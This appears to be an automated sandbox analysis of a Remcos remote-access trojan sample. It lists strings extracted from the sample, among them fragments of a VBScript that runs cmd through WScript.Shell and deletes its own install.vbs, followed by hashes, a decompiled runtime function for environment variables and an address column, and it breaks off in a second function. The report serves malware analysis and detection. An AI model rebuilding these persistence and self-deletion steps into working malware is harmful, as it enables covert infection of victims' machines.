                    • String ID: """, 0$6$C:\Windows\SysWOW64\DpiScaling.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                    • API String ID: 4018752923-2578384121
                    • Opcode ID: f06eaad87278a9b20e184628e2dc9dad4c598378312cbd5f85f7dc0a88970244
                    • Instruction ID: 190cd27c0b7bf58ebe4b0d8389cb7e98ba8e890002f8b4040f3ff986190cfdad
                    • Opcode Fuzzy Hash: f06eaad87278a9b20e184628e2dc9dad4c598378312cbd5f85f7dc0a88970244
                    • Instruction Fuzzy Hash: C4A1637160020456CB28FBA5DC92AFF737AAF54344F54407FF806B61D2EE386E46C66A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E004476AD(signed int _a4, signed int _a8) {
                    				signed int _v0;
                    				signed char _v5;
                    				intOrPtr _v8;
                    				signed char _v9;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v44;
                    				signed int _v92;
                    				signed int _v128;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t116;
                    				signed int _t119;
                    				signed int _t120;
                    				signed int _t122;
                    				signed int _t123;
                    				signed int _t126;
                    				signed int _t127;
                    				signed int _t131;
                    				signed int _t133;
                    				signed int _t136;
                    				signed int _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				void* _t143;
                    				signed int _t148;
                    				signed int* _t150;
                    				signed int* _t156;
                    				signed int _t163;
                    				signed int _t165;
                    				signed int _t167;
                    				intOrPtr _t168;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t176;
                    				signed int _t180;
                    				signed int _t185;
                    				intOrPtr* _t186;
                    				signed int _t191;
                    				signed int _t196;
                    				signed int _t197;
                    				signed int _t204;
                    				intOrPtr* _t205;
                    				signed int _t214;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t218;
                    				signed int _t220;
                    				signed int _t221;
                    				signed int _t223;
                    				intOrPtr _t225;
                    				void* _t231;
                    				signed int _t233;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				void* _t241;
                    				signed int _t244;
                    				signed int _t246;
                    				void* _t252;
                    				signed int _t253;
                    				signed int _t254;
                    				void* _t260;
                    				void* _t262;
                    				signed int _t263;
                    				intOrPtr* _t267;
                    				intOrPtr* _t271;
                    				signed int _t274;
                    				signed int _t276;
                    				signed int _t280;
                    				signed int _t282;
                    				void* _t283;
                    				void* _t284;
                    				void* _t285;
                    				signed int _t286;
                    				signed int _t288;
                    				signed int _t290;
                    				signed int _t291;
                    				signed int* _t292;
                    				signed int _t298;
                    				signed int _t299;
                    				CHAR* _t300;
                    				signed int _t302;
                    				signed int _t303;
                    				WCHAR* _t304;
                    				signed int _t305;
                    				signed int _t306;
                    				signed int* _t307;
                    				signed int _t308;
                    				signed int _t310;
                    				void* _t316;
                    				void* _t317;
                    				void* _t318;
                    				void* _t320;
                    				void* _t321;
                    				void* _t322;
                    				void* _t323;
                    
                    				_t217 = _a4;
                    				if(_t217 != 0) {
                    					_t286 = _t217;
                    					_t116 = E00434F60(_t217, 0x3d);
                    					_v16 = _t116;
                    					_t231 = _t285;
                    					__eflags = _t116;
                    					if(_t116 == 0) {
                    						L10:
                    						 *((intOrPtr*)(E0043A504())) = 0x16;
                    						goto L11;
                    					} else {
                    						__eflags = _t116 - _t217;
                    						if(_t116 == _t217) {
                    							goto L10;
                    						} else {
                    							__eflags =  *((char*)(_t116 + 1));
                    							_t298 =  *0x46b4d0; // 0x2fba800
                    							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                    							_v5 = _t120;
                    							__eflags = _t298 -  *0x46b4dc; // 0x2fba800
                    							if(__eflags == 0) {
                    								L87();
                    								_t298 = _t120;
                    								_t120 = _v5;
                    								_t231 = _t298;
                    								 *0x46b4d0 = _t298;
                    							}
                    							_t218 = 0;
                    							__eflags = _t298;
                    							if(_t298 != 0) {
                    								L21:
                    								_t233 = _t286;
                    								_t122 = _v16 - _t233;
                    								_push(_t122);
                    								_push(_t233);
                    								L121();
                    								_v12 = _t122;
                    								__eflags = _t122;
                    								if(_t122 < 0) {
                    									L29:
                    									__eflags = _v5 - _t218;
                    									if(_v5 != _t218) {
                    										goto L12;
                    									} else {
                    										_t123 =  ~_t122;
                    										_v12 = _t123;
                    										_t27 = _t123 + 2; // 0x2
                    										_t236 = _t27;
                    										__eflags = _t236 - _t123;
                    										if(_t236 < _t123) {
                    											goto L11;
                    										} else {
                    											__eflags = _t236 - 0x3fffffff;
                    											if(_t236 >= 0x3fffffff) {
                    												goto L11;
                    											} else {
                    												_push(4);
                    												_push(_t236);
                    												_t299 = E00447D55(_t298);
                    												E004401F5(_t218);
                    												_t320 = _t320 + 0x10;
                    												__eflags = _t299;
                    												if(_t299 == 0) {
                    													goto L11;
                    												} else {
                    													_t237 = _v12;
                    													_t286 = _t218;
                    													_t126 = _a4;
                    													 *(_t299 + _t237 * 4) = _t126;
                    													 *(_t299 + 4 + _t237 * 4) = _t218;
                    													goto L34;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags =  *_t298 - _t218;
                    									if( *_t298 == _t218) {
                    										goto L29;
                    									} else {
                    										E004401F5( *((intOrPtr*)(_t298 + _t122 * 4)));
                    										_t282 = _v12;
                    										__eflags = _v5 - _t218;
                    										if(_v5 != _t218) {
                    											while(1) {
                    												__eflags =  *(_t298 + _t282 * 4) - _t218;
                    												if( *(_t298 + _t282 * 4) == _t218) {
                    													break;
                    												}
                    												_t19 = _t282 * 4; // 0x2fbfc48
                    												 *(_t298 + _t282 * 4) =  *(_t298 + _t19 + 4);
                    												_t282 = _t282 + 1;
                    												__eflags = _t282;
                    											}
                    											_push(4);
                    											_push(_t282);
                    											_t299 = E00447D55(_t298);
                    											E004401F5(_t218);
                    											_t320 = _t320 + 0x10;
                    											_t126 = _t286;
                    											__eflags = _t299;
                    											if(_t299 != 0) {
                    												L34:
                    												 *0x46b4d0 = _t299;
                    											}
                    										} else {
                    											_t126 = _a4;
                    											_t286 = _t218;
                    											 *(_t298 + _t282 * 4) = _t126;
                    										}
                    										__eflags = _a8 - _t218;
                    										if(_a8 == _t218) {
                    											goto L12;
                    										} else {
                    											_t238 = _t126;
                    											_t283 = _t238 + 1;
                    											do {
                    												_t127 =  *_t238;
                    												_t238 = _t238 + 1;
                    												__eflags = _t127;
                    											} while (_t127 != 0);
                    											_v12 = _t238 - _t283 + 2;
                    											_t300 = E0043F348(_t238 - _t283, _t238 - _t283 + 2, 1);
                    											_pop(_t241);
                    											__eflags = _t300;
                    											if(_t300 == 0) {
                    												L42:
                    												E004401F5(_t300);
                    												goto L12;
                    											} else {
                    												_t131 = E00441916(_t300, _v12, _a4);
                    												_t321 = _t320 + 0xc;
                    												__eflags = _t131;
                    												if(_t131 != 0) {
                    													_push(_t218);
                    													_push(_t218);
                    													_push(_t218);
                    													_push(_t218);
                    													_push(_t218);
                    													E0043698A();
                    													asm("int3");
                    													_t316 = _t321;
                    													_t322 = _t321 - 0xc;
                    													_push(_t218);
                    													_t220 = _v44;
                    													__eflags = _t220;
                    													if(_t220 != 0) {
                    														_push(_t300);
                    														_push(_t286);
                    														_push(0x3d);
                    														_t288 = _t220;
                    														_t133 = E00450FF7(_t241);
                    														_v20 = _t133;
                    														_t244 = _t220;
                    														__eflags = _t133;
                    														if(_t133 == 0) {
                    															L54:
                    															 *((intOrPtr*)(E0043A504())) = 0x16;
                    															goto L55;
                    														} else {
                    															__eflags = _t133 - _t220;
                    															if(_t133 == _t220) {
                    																goto L54;
                    															} else {
                    																_t302 =  *0x46b4d4; // 0x2fce800
                    																_t221 = 0;
                    																__eflags =  *(_t133 + 2);
                    																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                    																_v9 = _t246;
                    																__eflags = _t302 -  *0x46b4d8; // 0x2fced80
                    																if(__eflags == 0) {
                    																	_push(_t302);
                    																	L104();
                    																	_t246 = _v9;
                    																	_t302 = _t133;
                    																	 *0x46b4d4 = _t302;
                    																}
                    																__eflags = _t302;
                    																if(_t302 != 0) {
                    																	L64:
                    																	_v20 = _v20 - _t288 >> 1;
                    																	_t138 = E00447CE8(_t288, _v20 - _t288 >> 1);
                    																	_v16 = _t138;
                    																	__eflags = _t138;
                    																	if(_t138 < 0) {
                    																		L72:
                    																		__eflags = _v9 - _t221;
                    																		if(_v9 != _t221) {
                    																			goto L56;
                    																		} else {
                    																			_t139 =  ~_t138;
                    																			_v16 = _t139;
                    																			_t72 = _t139 + 2; // 0x2
                    																			_t252 = _t72;
                    																			__eflags = _t252 - _t139;
                    																			if(_t252 < _t139) {
                    																				goto L55;
                    																			} else {
                    																				__eflags = _t252 - 0x3fffffff;
                    																				if(_t252 >= 0x3fffffff) {
                    																					goto L55;
                    																				} else {
                    																					_push(4);
                    																					_push(_t252);
                    																					_t303 = E00447D55(_t302);
                    																					E004401F5(_t221);
                    																					_t322 = _t322 + 0x10;
                    																					__eflags = _t303;
                    																					if(_t303 == 0) {
                    																						goto L55;
                    																					} else {
                    																						_t253 = _v16;
                    																						_t288 = _t221;
                    																						_t142 = _v0;
                    																						 *(_t303 + _t253 * 4) = _t142;
                    																						 *(_t303 + 4 + _t253 * 4) = _t221;
                    																						goto L77;
                    																					}
                    																				}
                    																			}
                    																		}
                    																	} else {
                    																		__eflags =  *_t302 - _t221;
                    																		if( *_t302 == _t221) {
                    																			goto L72;
                    																		} else {
                    																			E004401F5( *((intOrPtr*)(_t302 + _t138 * 4)));
                    																			_t276 = _v16;
                    																			__eflags = _v9 - _t221;
                    																			if(_v9 != _t221) {
                    																				while(1) {
                    																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                    																					if( *(_t302 + _t276 * 4) == _t221) {
                    																						break;
                    																					}
                    																					_t64 = _t276 * 4; // 0x2fca5e8
                    																					 *(_t302 + _t276 * 4) =  *(_t302 + _t64 + 4);
                    																					_t276 = _t276 + 1;
                    																					__eflags = _t276;
                    																				}
                    																				_push(4);
                    																				_push(_t276);
                    																				_t303 = E00447D55(_t302);
                    																				E004401F5(_t221);
                    																				_t322 = _t322 + 0x10;
                    																				_t142 = _t288;
                    																				__eflags = _t303;
                    																				if(_t303 != 0) {
                    																					L77:
                    																					 *0x46b4d4 = _t303;
                    																				}
                    																			} else {
                    																				_t142 = _v0;
                    																				_t288 = _t221;
                    																				 *(_t302 + _t276 * 4) = _t142;
                    																			}
                    																			__eflags = _a4 - _t221;
                    																			if(_a4 == _t221) {
                    																				goto L56;
                    																			} else {
                    																				_t254 = _t142;
                    																				_t81 = _t254 + 2; // 0x2
                    																				_t284 = _t81;
                    																				do {
                    																					_t143 =  *_t254;
                    																					_t254 = _t254 + 2;
                    																					__eflags = _t143 - _t221;
                    																				} while (_t143 != _t221);
                    																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                    																				_v16 = _t82;
                    																				_t304 = E0043F348(_t254 - _t284 >> 1, _t82, 2);
                    																				_pop(_t258);
                    																				__eflags = _t304;
                    																				if(_t304 == 0) {
                    																					L85:
                    																					E004401F5(_t304);
                    																					goto L56;
                    																				} else {
                    																					_t148 = E004415D4(_t304, _v16, _v0);
                    																					_t323 = _t322 + 0xc;
                    																					__eflags = _t148;
                    																					if(_t148 != 0) {
                    																						_push(_t221);
                    																						_push(_t221);
                    																						_push(_t221);
                    																						_push(_t221);
                    																						_push(_t221);
                    																						E0043698A();
                    																						asm("int3");
                    																						_push(_t316);
                    																						_t317 = _t323;
                    																						_push(_t288);
                    																						_t290 = _v92;
                    																						__eflags = _t290;
                    																						if(_t290 != 0) {
                    																							_t260 = 0;
                    																							_t150 = _t290;
                    																							__eflags =  *_t290;
                    																							if( *_t290 != 0) {
                    																								do {
                    																									_t150 =  &(_t150[1]);
                    																									_t260 = _t260 + 1;
                    																									__eflags =  *_t150;
                    																								} while ( *_t150 != 0);
                    																							}
                    																							_t93 = _t260 + 1; // 0x2
                    																							_t305 = E0043F348(_t260, _t93, 4);
                    																							_t262 = _t304;
                    																							__eflags = _t305;
                    																							if(_t305 == 0) {
                    																								L102:
                    																								E0043F949(_t221, _t284, _t290, _t305);
                    																								goto L103;
                    																							} else {
                    																								__eflags =  *_t290;
                    																								if( *_t290 == 0) {
                    																									L100:
                    																									E004401F5(0);
                    																									_t175 = _t305;
                    																									goto L101;
                    																								} else {
                    																									_push(_t221);
                    																									_t221 = _t305 - _t290;
                    																									__eflags = _t221;
                    																									do {
                    																										_t271 =  *_t290;
                    																										_t94 = _t271 + 1; // 0x5
                    																										_t284 = _t94;
                    																										do {
                    																											_t176 =  *_t271;
                    																											_t271 = _t271 + 1;
                    																											__eflags = _t176;
                    																										} while (_t176 != 0);
                    																										_t262 = _t271 - _t284;
                    																										_t95 = _t262 + 1; // 0x6
                    																										_v16 = _t95;
                    																										 *(_t221 + _t290) = E0043F348(_t262, _t95, 1);
                    																										E004401F5(0);
                    																										_t323 = _t323 + 0xc;
                    																										__eflags =  *(_t221 + _t290);
                    																										if( *(_t221 + _t290) == 0) {
                    																											goto L102;
                    																										} else {
                    																											_t180 = E00441916( *(_t221 + _t290), _v16,  *_t290);
                    																											_t323 = _t323 + 0xc;
                    																											__eflags = _t180;
                    																											if(_t180 != 0) {
                    																												L103:
                    																												_push(0);
                    																												_push(0);
                    																												_push(0);
                    																												_push(0);
                    																												_push(0);
                    																												E0043698A();
                    																												asm("int3");
                    																												_push(_t317);
                    																												_t318 = _t323;
                    																												_push(_t262);
                    																												_push(_t262);
                    																												_push(_t290);
                    																												_t291 = _v128;
                    																												__eflags = _t291;
                    																												if(_t291 != 0) {
                    																													_push(_t221);
                    																													_t223 = 0;
                    																													_t156 = _t291;
                    																													_t263 = 0;
                    																													_v20 = 0;
                    																													_push(_t305);
                    																													__eflags =  *_t291;
                    																													if( *_t291 != 0) {
                    																														do {
                    																															_t156 =  &(_t156[1]);
                    																															_t263 = _t263 + 1;
                    																															__eflags =  *_t156;
                    																														} while ( *_t156 != 0);
                    																													}
                    																													_t104 = _t263 + 1; // 0x2
                    																													_t306 = E0043F348(_t263, _t104, 4);
                    																													__eflags = _t306;
                    																													if(_t306 == 0) {
                    																														L119:
                    																														E0043F949(_t223, _t284, _t291, _t306);
                    																														goto L120;
                    																													} else {
                    																														__eflags =  *_t291 - _t223;
                    																														if( *_t291 == _t223) {
                    																															L117:
                    																															E004401F5(_t223);
                    																															_t167 = _t306;
                    																															goto L118;
                    																														} else {
                    																															_t223 = _t306 - _t291;
                    																															__eflags = _t223;
                    																															do {
                    																																_t267 =  *_t291;
                    																																_t105 = _t267 + 2; // 0x6
                    																																_t284 = _t105;
                    																																do {
                    																																	_t168 =  *_t267;
                    																																	_t267 = _t267 + 2;
                    																																	__eflags = _t168 - _v20;
                    																																} while (_t168 != _v20);
                    																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                    																																_v24 = _t107;
                    																																 *(_t223 + _t291) = E0043F348(_t267 - _t284 >> 1, _t107, 2);
                    																																E004401F5(0);
                    																																_t323 = _t323 + 0xc;
                    																																__eflags =  *(_t223 + _t291);
                    																																if( *(_t223 + _t291) == 0) {
                    																																	goto L119;
                    																																} else {
                    																																	_t173 = E004415D4( *(_t223 + _t291), _v24,  *_t291);
                    																																	_t323 = _t323 + 0xc;
                    																																	__eflags = _t173;
                    																																	if(_t173 != 0) {
                    																																		L120:
                    																																		_push(0);
                    																																		_push(0);
                    																																		_push(0);
                    																																		_push(0);
                    																																		_push(0);
                    																																		E0043698A();
                    																																		asm("int3");
                    																																		_push(_t318);
                    																																		_push(_t223);
                    																																		_push(_t306);
                    																																		_push(_t291);
                    																																		_t292 =  *0x46b4d0; // 0x2fba800: CRT environment table; the loop below is a findenv-style lookup that matches the name prefix and then expects '=' (0x3d) or a terminating 0
                    																																		_t307 = _t292;
                    																																		__eflags =  *_t292;
                    																																		if( *_t292 == 0) {
                    																																			L127:
                    																																			_t308 = _t307 - _t292;
                    																																			__eflags = _t308;
                    																																			_t310 =  ~(_t308 >> 2);
                    																																		} else {
                    																																			_t225 = _v8;
                    																																			do {
                    																																				_t163 = E004444C3(_v12,  *_t307, _t225);
                    																																				_t323 = _t323 + 0xc;
                    																																				__eflags = _t163;
                    																																				if(_t163 != 0) {
                    																																					goto L126;
                    																																				} else {
                    																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                    																																					__eflags = _t165 - 0x3d;
                    																																					if(_t165 == 0x3d) {
                    																																						L129:
                    																																						_t310 = _t307 - _t292 >> 2;
                    																																					} else {
                    																																						__eflags = _t165;
                    																																						if(_t165 == 0) {
                    																																							goto L129;
                    																																						} else {
                    																																							goto L126;
                    																																						}
                    																																					}
                    																																				}
                    																																				goto L128;
                    																																				L126:
                    																																				_t307 =  &(_t307[1]);
                    																																				__eflags =  *_t307;
                    																																			} while ( *_t307 != 0);
                    																																			goto L127;
                    																																		}
                    																																		L128:
                    																																		return _t310;
                    																																	} else {
                    																																		goto L115;
                    																																	}
                    																																}
                    																																goto L130;
                    																																L115:
                    																																_t291 = _t291 + 4;
                    																																__eflags =  *_t291 - _t173;
                    																															} while ( *_t291 != _t173);
                    																															_t223 = 0;
                    																															__eflags = 0;
                    																															goto L117;
                    																														}
                    																													}
                    																												} else {
                    																													_t167 = 0;
                    																													L118:
                    																													return _t167;
                    																												}
                    																											} else {
                    																												goto L98;
                    																											}
                    																										}
                    																										goto L130;
                    																										L98:
                    																										_t290 = _t290 + 4;
                    																										__eflags =  *_t290 - _t180;
                    																									} while ( *_t290 != _t180);
                    																									goto L100;
                    																								}
                    																							}
                    																						} else {
                    																							_t175 = 0;
                    																							L101:
                    																							return _t175;
                    																						}
                    																					} else {
                    																						_t274 =  &(_t304[_v20 + 1]);
                    																						 *(_t274 - 2) = _t148;
                    																						asm("sbb eax, eax");
                    																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                    																						__eflags = _t185;
                    																						if(_t185 == 0) {
                    																							_t186 = E0043A504();
                    																							_t221 = _t221 | 0xffffffff;
                    																							__eflags = _t221;
                    																						 *_t186 = 0x2a; // errno = EILSEQ (42) after SetEnvironmentVariableW failure
                    																						}
                    																						goto L85;
                    																					}
                    																				}
                    																			}
                    																		}
                    																	}
                    																} else {
                    																	_t191 =  *0x46b4d0; // 0x2fba800
                    																	__eflags = _a4 - _t221;
                    																	if(_a4 == _t221) {
                    																		L58:
                    																		__eflags = _t246;
                    																		if(_t246 != 0) {
                    																			goto L56;
                    																		} else {
                    																			__eflags = _t191;
                    																			if(_t191 != 0) {
                    																				L62:
                    																				 *0x46b4d4 = E0043F348(_t246, 1, 4);
                    																				E004401F5(_t221);
                    																				_t322 = _t322 + 0xc;
                    																				goto L63;
                    																			} else {
                    																				 *0x46b4d0 = E0043F348(_t246, 1, 4);
                    																				E004401F5(_t221);
                    																				_t322 = _t322 + 0xc;
                    																				__eflags =  *0x46b4d0 - _t221; // 0x2fba800
                    																				if(__eflags == 0) {
                    																					goto L55;
                    																				} else {
                    																					_t302 =  *0x46b4d4; // 0x2fce800
                    																					__eflags = _t302;
                    																					if(_t302 != 0) {
                    																						goto L64;
                    																					} else {
                    																						goto L62;
                    																					}
                    																				}
                    																			}
                    																		}
                    																	} else {
                    																		__eflags = _t191;
                    																		if(_t191 == 0) {
                    																			goto L58;
                    																		} else {
                    																			_t196 = L0043D3FB(_t221);
                    																			__eflags = _t196;
                    																			if(_t196 != 0) {
                    																				L63:
                    																				_t302 =  *0x46b4d4; // 0x2fce800
                    																				__eflags = _t302;
                    																				if(_t302 == 0) {
                    																					L55:
                    																					_t221 = _t220 | 0xffffffff;
                    																					__eflags = _t221;
                    																					L56:
                    																					E004401F5(_t288);
                    																					_t136 = _t221;
                    																					goto L57;
                    																				} else {
                    																					goto L64;
                    																				}
                    																			} else {
                    																				goto L54;
                    																			}
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t197 = E0043A504();
                    														 *_t197 = 0x16; // errno = EINVAL (22): invalid argument
                    														_t136 = _t197 | 0xffffffff;
                    														L57:
                    														return _t136;
                    													}
                    												} else {
                    													_t280 = _v16 + 1 + _t300 - _a4;
                    													asm("sbb eax, eax");
                    													 *(_t280 - 1) = _t218;
                    													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                    													__eflags = _t204;
                    													if(_t204 == 0) {
                    														_t205 = E0043A504();
                    														_t218 = _t218 | 0xffffffff;
                    														__eflags = _t218;
                    														 *_t205 = 0x2a; // errno = EILSEQ (42) after SetEnvironmentVariableA failure
                    													}
                    													goto L42;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							} else {
                    								__eflags = _a8;
                    								if(_a8 == 0) {
                    									L14:
                    									__eflags = _t120;
                    									if(_t120 == 0) {
                    										 *0x46b4d0 = E0043F348(_t231, 1, 4);
                    										E004401F5(_t218);
                    										_t298 =  *0x46b4d0; // 0x2fba800
                    										_t320 = _t320 + 0xc;
                    										__eflags = _t298;
                    										if(_t298 == 0) {
                    											goto L11;
                    										} else {
                    											__eflags =  *0x46b4d4 - _t218; // 0x2fce800
                    											if(__eflags != 0) {
                    												goto L20;
                    											} else {
                    												 *0x46b4d4 = E0043F348(_t231, 1, 4);
                    												E004401F5(_t218);
                    												_t320 = _t320 + 0xc;
                    												__eflags =  *0x46b4d4 - _t218; // 0x2fce800
                    												if(__eflags == 0) {
                    													goto L11;
                    												} else {
                    													goto L19;
                    												}
                    											}
                    										}
                    									} else {
                    										_t218 = 0;
                    										goto L12;
                    									}
                    								} else {
                    									__eflags =  *0x46b4d4 - _t218; // 0x2fce800
                    									if(__eflags == 0) {
                    										goto L14;
                    									} else {
                    										_t214 = L0043D3F6(0);
                    										__eflags = _t214;
                    										if(_t214 != 0) {
                    											L19:
                    											_t298 =  *0x46b4d0; // 0x2fba800
                    											L20:
                    											__eflags = _t298;
                    											if(_t298 == 0) {
                    												L11:
                    												_t218 = _t217 | 0xffffffff;
                    												__eflags = _t218;
                    												L12:
                    												E004401F5(_t286);
                    												_t119 = _t218;
                    												goto L13;
                    											} else {
                    												goto L21;
                    											}
                    										} else {
                    											goto L10;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t215 = E0043A504();
                    					 *_t215 = 0x16; // errno = EINVAL (22): invalid argument
                    					_t119 = _t215 | 0xffffffff;
                    					L13:
                    					return _t119;
                    				}
                    				L130:
                    			}

                    (Per-line address column of the listing above, flattened by extraction: instruction addresses from 0x004476b6 through 0x00447c5d, with 0x00000000 entries on lines that carry no address.)
                    0x00447c62
                    0x00447c65
                    0x00447c67
                    0x00447c87
                    0x00447c89
                    0x00447c8a
                    0x00447c8b
                    0x00447c8c
                    0x00447c8d
                    0x00447c8e
                    0x00447c93
                    0x00447c96
                    0x00447c99
                    0x00447c9a
                    0x00447c9b
                    0x00447c9c
                    0x00447ca2
                    0x00447ca4
                    0x00447ca7
                    0x00447cd3
                    0x00447cd3
                    0x00447cd3
                    0x00447cd8
                    0x00447ca9
                    0x00447ca9
                    0x00447cac
                    0x00447cb2
                    0x00447cb7
                    0x00447cba
                    0x00447cbc
                    0x00000000
                    0x00447cbe
                    0x00447cc0
                    0x00447cc3
                    0x00447cc5
                    0x00447ce1
                    0x00447ce3
                    0x00447cc7
                    0x00447cc7
                    0x00447cc9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447cc9
                    0x00447cc5
                    0x00000000
                    0x00447ccb
                    0x00447ccb
                    0x00447cce
                    0x00447cce
                    0x00000000
                    0x00447cac
                    0x00447cda
                    0x00447ce0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447c67
                    0x00000000
                    0x00447c69
                    0x00447c69
                    0x00447c6c
                    0x00447c6c
                    0x00447c70
                    0x00447c70
                    0x00000000
                    0x00447c70
                    0x00447c18
                    0x00447be5
                    0x00447be5
                    0x00447c7d
                    0x00447c81
                    0x00447c81
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447baa
                    0x00000000
                    0x00447bac
                    0x00447bac
                    0x00447baf
                    0x00447baf
                    0x00000000
                    0x00447bb3
                    0x00447b62
                    0x00447b33
                    0x00447b33
                    0x00447bbf
                    0x00447bc3
                    0x00447bc3
                    0x00447add
                    0x00447ae1
                    0x00447ae4
                    0x00447aee
                    0x00447af6
                    0x00447afc
                    0x00447afe
                    0x00447b00
                    0x00447b05
                    0x00447b05
                    0x00447b08
                    0x00447b08
                    0x00000000
                    0x00447afe
                    0x00447adb
                    0x00447ac7
                    0x00447a99
                    0x004479fa
                    0x00447955
                    0x00447955
                    0x0044795a
                    0x0044795d
                    0x0044798a
                    0x0044798a
                    0x0044798c
                    0x00000000
                    0x0044798e
                    0x0044798e
                    0x00447990
                    0x004479bb
                    0x004479c5
                    0x004479ca
                    0x004479cf
                    0x00000000
                    0x00447992
                    0x0044799c
                    0x004479a1
                    0x004479a6
                    0x004479a9
                    0x004479af
                    0x00000000
                    0x004479b1
                    0x004479b1
                    0x004479b7
                    0x004479b9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004479b9
                    0x004479af
                    0x00447990
                    0x0044795f
                    0x0044795f
                    0x00447961
                    0x00000000
                    0x00447963
                    0x00447963
                    0x00447968
                    0x0044796a
                    0x004479d2
                    0x004479d2
                    0x004479d8
                    0x004479da
                    0x00447977
                    0x00447977
                    0x00447977
                    0x0044797a
                    0x0044797b
                    0x00447982
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044796a
                    0x00447961
                    0x0044795d
                    0x0044794f
                    0x0044791f
                    0x004478f8
                    0x004478f8
                    0x004478fd
                    0x00447903
                    0x00447985
                    0x00447989
                    0x00447989
                    0x0044789d
                    0x004478a6
                    0x004478ae
                    0x004478b2
                    0x004478b9
                    0x004478bf
                    0x004478c1
                    0x004478c3
                    0x004478c8
                    0x004478c8
                    0x004478cb
                    0x004478cb
                    0x00000000
                    0x004478c1
                    0x0044789b
                    0x00447888
                    0x00447860
                    0x004477c1
                    0x0044771a
                    0x0044771a
                    0x0044771d
                    0x0044774e
                    0x0044774e
                    0x00447750
                    0x00447760
                    0x00447765
                    0x0044776a
                    0x00447770
                    0x00447773
                    0x00447775
                    0x00000000
                    0x00447777
                    0x00447777
                    0x0044777d
                    0x00000000
                    0x0044777f
                    0x00447789
                    0x0044778e
                    0x00447793
                    0x00447796
                    0x0044779c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044779c
                    0x0044777d
                    0x00447752
                    0x00447752
                    0x00000000
                    0x00447752
                    0x0044771f
                    0x0044771f
                    0x00447725
                    0x00000000
                    0x00447727
                    0x00447727
                    0x0044772c
                    0x0044772e
                    0x0044779e
                    0x0044779e
                    0x004477a4
                    0x004477a4
                    0x004477a6
                    0x0044773b
                    0x0044773b
                    0x0044773b
                    0x0044773e
                    0x0044773f
                    0x00447746
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044772e
                    0x00447725
                    0x0044771d
                    0x00447714
                    0x004476e4
                    0x004476bd
                    0x004476bd
                    0x004476c2
                    0x004476c8
                    0x00447749
                    0x0044774d
                    0x0044774d
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                    • String ID:
                    • API String ID: 2719235668-0
                    • Opcode ID: 370d3132cb26f4552ee1daba6f874517c8083149b8d61390565b9232581f8842
                    • Instruction ID: db3f33f972ccc31960696266c8304923ec6ec277b5ade58ccf050fecc9e19cec
                    • Opcode Fuzzy Hash: 370d3132cb26f4552ee1daba6f874517c8083149b8d61390565b9232581f8842
                    • Instruction Fuzzy Hash: 15D148B1908300AFFB21AF758881A6F77A8EF05354F14416FE945A7382EB7D9902C79D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E004064A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
                    				void* _v12;
                    				union _LARGE_INTEGER _v16;
                    				struct _OVERLAPPED* _v20;
                    				long _v24;
                    				long _v28;
                    				intOrPtr _v32;
                    				long _v36;
                    				struct _OVERLAPPED* _v40;
                    				union _LARGE_INTEGER* _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				struct %anon52 _v64;
                    				intOrPtr _v68;
                    				struct %anon52 _v80;
                    				union _LARGE_INTEGER _v84;
                    				intOrPtr _v88;
                    				char _v112;
                    				char _v136;
                    				char _v160;
                    				char _v184;
                    				char _v208;
                    				char _v232;
                    				char _v256;
                    				char _v280;
                    				char _v304;
                    				char _v328;
                    				char _v352;
                    				char _v376;
                    				char _v400;
                    				char _v424;
                    				char _v448;
                    				char _v472;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct %anon52 _t117;
                    				void* _t119;
                    				void* _t126;
                    				long _t136;
                    				void* _t137;
                    				signed int _t138;
                    				struct _OVERLAPPED* _t145;
                    				signed int _t148;
                    				void* _t154;
                    				void* _t156;
                    				void* _t157;
                    				void* _t173;
                    				long _t198;
                    				signed int _t203;
                    				void* _t216;
                    				union _LARGE_INTEGER _t280;
                    				intOrPtr _t281;
